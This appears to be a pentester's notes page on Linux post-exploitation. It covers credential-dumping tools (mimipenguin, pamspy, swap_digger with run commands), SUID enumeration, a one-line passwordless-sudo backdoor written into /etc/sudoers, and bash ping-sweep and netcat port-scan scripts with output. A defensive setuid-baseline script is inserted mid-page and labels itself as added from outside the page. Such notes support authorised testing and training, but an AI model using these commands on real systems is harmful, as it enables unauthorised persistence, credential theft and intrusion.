# Linux Post Exploitation

### Common Tools

* [**GTFOBins**](https://gtfobins.github.io/) **-** GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
* [**LinPEAS**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) **-** Linux local Privilege Escalation Awesome Script (linPEAS) is a script that searches for possible paths to escalate privileges on Linux/Unix hosts.
* [**pspy**](https://github.com/DominicBreuker/pspy) - Monitor Linux processes without root permissions
* [**pamspy**](https://github.com/citronneur/pamspy) - Credentials Dumper for Linux

### **SUID**

Although SUID binaries can be detected using LinPEAS, you can also run the following command to identify SUID files on the system.

```bash
find / -perm -u=s -type f 2>/dev/null
```
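As an added example (not code from the page or from any of the tools listed), a small bash helper that builds on the `find` command above: it records a baseline of setuid/setgid binaries and reports any that appear later, which is how a defender notices an unexpected privileged binary after a compromise. The function names and the constructed demo tree are assumptions made here.

```bash
#!/usr/bin/env bash
# Enumerate setuid/setgid binaries under a root and diff them against a
# saved baseline. Function names (find_setuid, save_baseline, new_setuid)
# are chosen for this example and are not part of any standard tool.

# find_setuid ROOT -> sorted list of setuid/setgid regular files under ROOT
find_setuid() {
    local root="${1:-/}"
    # -xdev keeps the walk on one filesystem (skips /proc, /sys and other mounts)
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null \
        | LC_ALL=C sort
}

# save_baseline ROOT FILE -> record the current list in FILE for later comparison
save_baseline() {
    find_setuid "$1" > "$2"
}

# new_setuid ROOT FILE -> print setuid/setgid files present now but absent from FILE
new_setuid() {
    local root="$1" baseline="$2" sorted
    sorted=$(mktemp)
    LC_ALL=C sort "$baseline" > "$sorted"
    # comm -13 keeps lines found only in the second (current) input
    find_setuid "$root" | LC_ALL=C comm -13 "$sorted" -
    rm -f "$sorted"
}

# Demo on a constructed directory tree (not a real system root)
demo() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/bin"
    printf '#!/bin/sh\n' > "$root/bin/normal"
    printf '#!/bin/sh\n' > "$root/bin/privileged"
    chmod 4755 "$root/bin/privileged"          # known setuid binary in the baseline
    save_baseline "$root" "$root/baseline.txt"
    printf '#!/bin/sh\n' > "$root/bin/dropped"
    chmod 4755 "$root/bin/dropped"             # appears after the baseline was taken
    echo "Setuid/setgid files added since baseline:"
    new_setuid "$root" "$root/baseline.txt"    # prints only .../bin/dropped
    rm -rf "$root"
}

demo
```

On a real host, run `save_baseline / /var/lib/setuid-baseline.txt` once from a known-good state and schedule `new_setuid` to alert on additions.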

### swap\_digger

swap\_digger is a bash script that automates Linux swap analysis for post-exploitation or forensic purposes. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSIDs and keys, etc.

{% code overflow="wrap" %}

```bash
git clone https://github.com/sevagas/swap_digger.git
cd swap_digger
chmod +x swap_digger.sh
sudo ./swap_digger.sh -vx
```

{% endcode %}

### mimipenguin

A tool to dump the login password of the current Linux user.

* <https://github.com/huntergregal/mimipenguin>

### Add User as Passwordless Sudo

{% code overflow="wrap" %}

```bash
echo 'asuka    ALL=(ALL) NOPASSWD:ALL' | tee -a /etc/sudoers
```

{% endcode %}

### Ping Sweep with Bash

* [**ping-sweep.sh**](https://raw.githubusercontent.com/yuyudhn/nino-stuff/main/bash/ping-sweep.sh)

{% code overflow="wrap" %}

```bash
➜  bash git:(main) bash ping-sweep.sh 192.168.1.1-254
192.168.1.1
192.168.1.4
192.168.1.5
192.168.1.2
192.168.1.7
192.168.1.8
192.168.1.15
192.168.1.30
192.168.1.14
192.168.1.24
192.168.1.12
192.168.1.22
```

{% endcode %}

### Port Scan with Bash

* [**port-scan-nc.sh**](https://raw.githubusercontent.com/yuyudhn/nino-stuff/main/bash/port-scan-nc.sh)

Port scanning with netcat.

{% code overflow="wrap" %}

```bash
➜  bash git:(main) bash port-scan-nc.sh 192.168.1.1 1-5000
Scanning ports 1 to 5000 on 192.168.1.1...
[192.168.1.1] 21 (ftp) open
[192.168.1.1] 53 (domain) open
[192.168.1.1] 80 (http) open
[192.168.1.1] 443 (https) open
```

{% endcode %}

* [**port-scan.sh**](https://raw.githubusercontent.com/yuyudhn/nino-stuff/main/bash/port-scan.sh)

Simple TCP port scanning with bash.

{% code overflow="wrap" %}

```bash
➜  bash git:(main) bash port-scan.sh 192.168.1.1 1 5000
Scanning 192.168.1.1 (ports 1 to 5000)
PORT    STATE   SERVICE
21/tcp  open    ftp
53/tcp  open    domain
80/tcp  open    http
443/tcp open    https
```

{% endcode %}

{% hint style="info" %}
**Note**: This page is incomplete and will be regularly updated. If you have any ideas or resources that need to be added, please contact me at <yuyudhn@gmail.com>.
{% endhint %}

